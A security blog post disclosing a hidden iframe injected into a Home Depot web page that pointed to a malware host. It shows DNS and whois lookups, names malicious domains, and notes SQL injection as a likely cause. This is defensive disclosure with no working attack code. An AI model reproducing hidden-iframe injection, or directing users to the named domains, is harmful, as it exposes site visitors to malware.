It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website. It all started with a simple Google search for “home depot stair spindles”.
The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.
As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.
As can be seen in the screenshot, the below code has been injected into the page:
The site vwui.com is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.
After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting. As it turns out, this domain no longer resolves.
[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)
StopBadWare lists the IP associated with this domain as which according to the whois database belongs to ThePlanet.com Internet Services.
[prompt ~]$ whois
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 –
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 –
Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.
So how did this page on Home Depot’s website get compromised? While it’s not possible for me to know for certain without doing an complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:
- Compromised FTP credentials due to a weak password
- Brute force compromise of server credentials
- SQL injection
Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe. They also tended to host their malware on port 8080 rather than the standard port 80. Given the fact that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and the fact that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and only now has been discovered. While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present which could lead to a future compromise of this site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.
Tags: Hidden Iframe, Home Depot Hack
-
Pingback from on January 11, 2011 at 1:31 am
-
I would like to thank Scott Frost and Steve Bush for pointing out that the malicious iframe I discovered on the Home Depot web site had been commented out. This was an oversight on my part and was not left out of the article intentionally. Nevertheless, the point of my story is the same. At some time in the past this page was injected with an iframe that linked to a malicious web site. It is reasonable to assume that this code was active and likely did result in the infection of some Home Depot site visitors’ PCs. This iframe must have been detected by Home Depot at some point and the developer decided to comment out the iframe rather than delete it. The malicious site in question was also taken down at some point. It is worth noting that my AV software still detected the commented iframe (nice job Avast) which is what led me to the discovery.
-
FoxNews.com picked up this story. You can read it here:
3 comments
Trackback link: https://infosecstuff.com/wp-trackback.php?p=572